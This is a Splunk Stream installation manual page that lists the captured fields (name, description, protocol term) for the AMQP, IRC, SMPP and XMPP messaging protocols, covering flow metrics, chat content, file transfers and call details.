Splunk Stream

Installation and Configuration Manual

Messaging

Splunk App for Stream supports capture of these Messaging protocols on Linux, Mac, and Windows. For more information see Configure Streams in the Splunk App for Stream User Manual.

AMQP

Advanced Messaging Queuing Protocol ISO/IEC 19464

Name Description Term
major_version Major version of the protocol amqp.major-version
method Command launched amqp.method
minor_version Minor version of the protocol amqp.minor-version
response_time Server response time in microseconds amqp.response-time
bytes The total number of bytes transferred flow.bytes
src_ip Client IP Address flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
bytes_in The number of bytes sent from client to server flow.cs-bytes
packets_in The total number of packets sent from client to server flow.cs-packets
dest_ip Server IP Address flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
bytes_out The number of bytes sent from server to client flow.sc-bytes
packets_out The total number of packets sent from server to client flow.sc-packets
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport level protocol flow.transport

IRC

Internet Relay Chat RFC 1459

Name Description Term
bytes The total number of bytes transferred flow.bytes
c_ip IP address of the client in dot-quad notation flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
canceled Number of HTTP responses that were canceled early by the client flow.canceled
connection TCP session server endpoint (IP address and TCP port) flow.connection
client_rtt Average round trip time, in microseconds, from the client to the point of capture flow.cp-rtt
client_rtt_packets Number of round trip measurements from the client to the point of capture flow.cp-rtt-packets
client_rtt_sum Sum of all round trip time measurements from the client to the point of capture flow.cp-rtt-sum
ack_packets_in The number of acknowledgement packets sent from client to server flow.cs-ack-packets
request_ack_time Number of microseconds that it took the server to acknowledge receipt of the request flow.cs-ack-time
bytes_in The number of bytes sent from client to server flow.cs-bytes
data_packets_in The number of data packets sent from client to server flow.cs-data-packets
duplicate_packets_in The number of duplicate packets sent from client to server flow.cs-duplicate-packets
missing_packets_in The number of missing packet gaps detected within the request flow.cs-missing-packets
packets_in The total number of packets sent from client to server flow.cs-packets
request_time Number of microseconds it took the client to send a request flow.cs-send-time
server_rtt Average round trip time, in microseconds, from the server to the point of capture flow.ps-rtt
server_rtt_packets Number of round trip measurements from the server to the point of capture flow.ps-rtt-packets
server_rtt_sum Sum of all round trip time measurements from the server to the point of capture flow.ps-rtt-sum
refused Number of requests that were refused by the server flow.refused
dest_ip IP address of the server in dot-quad notation flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
ack_packets_out The number of acknowledgement packets sent from server to client flow.sc-ack-packets
response_ack_time Number of microseconds that it took the client to acknowledge receipt of the response flow.sc-ack-time
bytes_out The number of bytes sent from server to client flow.sc-bytes
data_packets_out The number of data packets sent from server to client flow.sc-data-packets
duplicate_packets_out The number of duplicate packets sent from server to client flow.sc-duplicate-packets
missing_packets_out The number of missing packet gaps detected within the response flow.sc-missing-packets
packets_out The total number of packets sent from server to client flow.sc-packets
reply_time Number of microseconds that it took the server to start replying to a request flow.sc-reply-time
response_time Number of microseconds that it took the server to send a response flow.sc-send-time
ssl_time Number of microseconds that it took to negotiate an SSL handshake flow.ssl-time
ssl_version SSL protocol version used for encryption; undefined if not encrypted flow.ssl-version
tcp_status TCP handshake status (0=OK, 1=RESET, 2=IGNORED) flow.tcp-status
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport layer protocol (udp or tcp) flow.transport
chat_room_name Chat room name irc.channel
channel_name Name of the IRC channel irc.channel-name
file_identifier File correlation key irc.file-id
filename Name of the transferred file irc.filename
login User's login string irc.login
login_server Concatenated login and server irc.login-server
message Contains the chat message irc.message
mode Status of the IRC channel irc.mode-status
nickname User's alias irc.nick-name
receiver The identity of the receiver for a chat message or a file transfer irc.receiver
sender The identity of the sender of a chat session or a file transfer irc.sender
server Server name to which the user is connected irc.server

SMPP

Short Message Peer to Peer

Name Description Term
content Content of the Short Message smpp.content
receiver Receiver address smpp.receiver
sender Sender address smpp.sender
bytes Total number of bytes transferred flow.bytes
src_ip Client IP Address flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
bytes_in The number of bytes sent from client to server flow.cs-bytes
packets_in The total number of packets sent from client to server flow.cs-packets
dest_ip Server IP Address flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
bytes_out The number of bytes sent from server to client flow.sc-bytes
packets_out The total number of packets sent from server to client flow.sc-packets
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport level protocol flow.transport

XMPP

Extensible Messaging and Presence Protocol RFC 6120

Name Description Term
bytes The total number of bytes transferred flow.bytes
c_ip IP address of the client in dot-quad notation flow.c-ip
src_mac Client packets MAC address in hexadecimal format flow.c-mac
src_port Client port number flow.c-port
canceled Number of HTTP responses that were canceled early by the client flow.canceled
connection TCP session server endpoint (IP address and TCP port) flow.connection
client_rtt Average round trip time, in microseconds, from the client to the point of capture flow.cp-rtt
client_rtt_packets Number of round trip measurements from the client to the point of capture flow.cp-rtt-packets
client_rtt_sum Sum of all round trip time measurements from the client to the point of capture flow.cp-rtt-sum
ack_packets_in The number of acknowledgement packets sent from client to server flow.cs-ack-packets
request_ack_time Number of microseconds that it took the server to acknowledge receipt of the request flow.cs-ack-time
bytes_in The number of bytes sent from client to server flow.cs-bytes
data_packets_in The number of data packets sent from client to server flow.cs-data-packets
duplicate_packets_in The number of duplicate packets sent from client to server flow.cs-duplicate-packets
missing_packets_in The number of missing packet gaps detected within the request flow.cs-missing-packets
packets_in The total number of packets sent from client to server flow.cs-packets
request_time Number of microseconds it took the client to send a request flow.cs-send-time
server_rtt Average round trip time, in microseconds, from the server to the point of capture flow.ps-rtt
server_rtt_packets Number of round trip measurements from the server to the point of capture flow.ps-rtt-packets
server_rtt_sum Sum of all round trip time measurements from the server to the point of capture flow.ps-rtt-sum
refused Number of requests that were refused by the server flow.refused
dest_ip IP address of the server in dot-quad notation flow.s-ip
dest_mac Server packets MAC address in hexadecimal format flow.s-mac
dest_port Server port number flow.s-port
ack_packets_out The number of acknowledgement packets sent from server to client flow.sc-ack-packets
response_ack_time Number of microseconds that it took the client to acknowledge receipt of the response flow.sc-ack-time
bytes_out The number of bytes sent from server to client flow.sc-bytes
data_packets_out The number of data packets sent from server to client flow.sc-data-packets
duplicate_packets_out The number of duplicate packets sent from server to client flow.sc-duplicate-packets
missing_packets_out The number of missing packet gaps detected within the response flow.sc-missing-packets
packets_out The total number of packets sent from server to client flow.sc-packets
reply_time Number of microseconds it took the server to start replying to a request flow.sc-reply-time
response_time Number of microseconds it took the server to send a response flow.sc-send-time
ssl_time Number of microseconds it took to negotiate an SSL handshake flow.ssl-time
ssl_version SSL protocol version used for encryption, or undefined if not encrypted flow.ssl-version
tcp_status TCP handshake status (0=OK, 1=RESET, 2=IGNORED) flow.tcp-status
time_taken Number of microseconds, from the end user perspective, that it took to complete a flow event flow.time-taken
transport Transport layer protocol (udp or tcp) flow.transport
call_duration Contains call duration in microseconds xmpp.call-duration
call_id Contains call ID, extracted for each call xmpp.call-id
callee Contains the identity (or the phone number) of the called party for a call xmpp.callee
callee_addr Contains address that could be used by the called party xmpp.callee-address
callee_port Contains port on which the callee could receive a call xmpp.callee-port
caller Contains the identity (or the phone number) of the initiator of the call xmpp.caller
caller_addr Contains address which could be used by the initiator of the call xmpp.caller-address
caller_port Contains port on which the caller could start the call xmpp.caller-port
os Contains the client operating system xmpp.client-os
contact_login Contact login xmpp.contact-login
contact_name Contact name xmpp.contact-name
contact_status Contact status xmpp.contact-status
file_chunk_content Contains content of the transferred data xmpp.file-chunk-content
file_chunk_len Contains size of the transferred piece xmpp.file-chunk-length
file_chunk_sid Transferred file identifier xmpp.file-chunk-sid
file_sender Contains the identity of the sender of a file transfer xmpp.file-sender
file_sid Contains transferred file identifier xmpp.file-sid
filesize Contains size (byte) of the transferred file xmpp.file-size
filename Contains the name of the transferred file xmpp.filename
login User's login string xmpp.login
message Contains the chat message xmpp.message
encoding Message encoding xmpp.message-encoding
nickname Used user name xmpp.nickname
receiver Contains the identity of the receiver of a chat message or a file transfer xmpp.receiver
sender Contains the identity of the sender of a chat session or a file transfer xmpp.sender
start_time Contains start date of the call xmpp.start-time
version JABBER software version xmpp.version

For instructions on configuring passive capture of supported protocol data, see "Configure Streams" in the Splunk App for Stream User Manual .

Last modified on 03 March, 2022
Infrastructure   Simple Transport

This documentation applies to the following versions of Splunk Stream: 8.0.1, 8.0.2, 8.1.0, 8.1.1, 8.1.3


Was this topic useful?







You must be logged into splunk.com in order to post comments. Log in now.

Please try to keep this discussion focused on the content covered in this documentation topic. If you have a more general question about Splunk functionality or are experiencing a difficulty with Splunk, consider posting a question to Splunkbase Answers.

0 out of 1000 Characters